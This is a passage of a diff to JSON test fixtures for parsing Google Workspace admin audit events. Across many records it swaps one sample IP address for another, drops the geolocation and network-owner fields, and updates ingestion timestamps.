@@ -3619,7 +2827,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3643,35 +2851,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091367900Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+ "ingested": "2021-12-09T13:38:31.915974600Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ENABLE_OAUTH_CONSUMER_KEY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "provider": "admin",
 "action": "TOGGLE_ENABLE_OAUTH_CONSUMER_KEY",
 "id": "1",
@@ -3702,7 +2892,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3726,35 +2916,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091370600Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSO_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+ "ingested": "2021-12-09T13:38:31.915980300Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSO_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "provider": "admin",
 "action": "TOGGLE_SSO_ENABLED",
 "id": "1",
@@ -3785,7 +2957,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3809,35 +2981,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091373400Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+ "ingested": "2021-12-09T13:38:31.915986300Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_SSL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "provider": "admin",
 "action": "TOGGLE_SSL",
 "id": "1",
@@ -3868,7 +3022,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3890,35 +3044,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091376200Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}",
+ "ingested": "2021-12-09T13:38:31.915992Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_EU_REPRESENTATIVE_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}",
 "provider": "admin",
 "action": "CHANGE_EU_REPRESENTATIVE_CONTACT_INFO",
 "id": "1",
@@ -3948,7 +3084,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3967,35 +3103,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091379100Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_TRANSFER_TOKEN\"}}",
+ "ingested": "2021-12-09T13:38:31.916015800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_TRANSFER_TOKEN\"}}",
 "provider": "admin",
 "action": "GENERATE_TRANSFER_TOKEN",
 "id": "1",
@@ -4025,7 +3143,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -4049,35 +3167,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091381900Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BACKGROUND_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "ingested": "2021-12-09T13:38:31.916021100Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BACKGROUND_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "CHANGE_LOGIN_BACKGROUND_COLOR",
 "id": "1",
@@ -4107,7 +3207,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -4131,35 +3231,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091384800Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BORDER_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "ingested": "2021-12-09T13:38:31.916024800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BORDER_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "CHANGE_LOGIN_BORDER_COLOR",
 "id": "1",
@@ -4189,7 +3271,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -4213,35 +3295,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091387500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_ACTIVITY_TRACE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "ingested": "2021-12-09T13:38:31.916029400Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_ACTIVITY_TRACE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "CHANGE_LOGIN_ACTIVITY_TRACE",
 "id": "1",
@@ -4271,7 +3335,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -4295,35 +3359,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091390200Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_ENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"},{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}",
+ "ingested": "2021-12-09T13:38:31.916035400Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_ENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"},{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}",
 "provider": "admin",
 "action": "PLAY_FOR_WORK_ENROLL",
 "id": "1",
@@ -4353,7 +3399,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -4377,35 +3423,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091393Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_UNENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"}]}}",
+ "ingested": "2021-12-09T13:38:31.916041800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_UNENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"}]}}",
 "provider": "admin",
 "action": "PLAY_FOR_WORK_UNENROLL",
 "id": "1",
@@ -4435,7 +3463,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -4459,35 +3487,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091395700Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"MX_RECORD_VERIFICATION_CLAIM\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:31.916047Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"MX_RECORD_VERIFICATION_CLAIM\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "MX_RECORD_VERIFICATION_CLAIM",
 "id": "1",
@@ -4517,7 +3527,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -4541,35 +3551,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091399800Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_NEW_APP_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+ "ingested": "2021-12-09T13:38:31.916050900Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_NEW_APP_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "provider": "admin",
 "action": "TOGGLE_NEW_APP_FEATURES",
 "id": "1",
@@ -4600,7 +3592,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -4624,35 +3616,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091402800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:31.916055700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_USE_NEXT_GEN_CONTROL_PANEL", "id": "1", @@ -4683,7 +3657,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -4707,35 +3681,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091405700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPLOAD_OAUTH_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.916061200Z", + 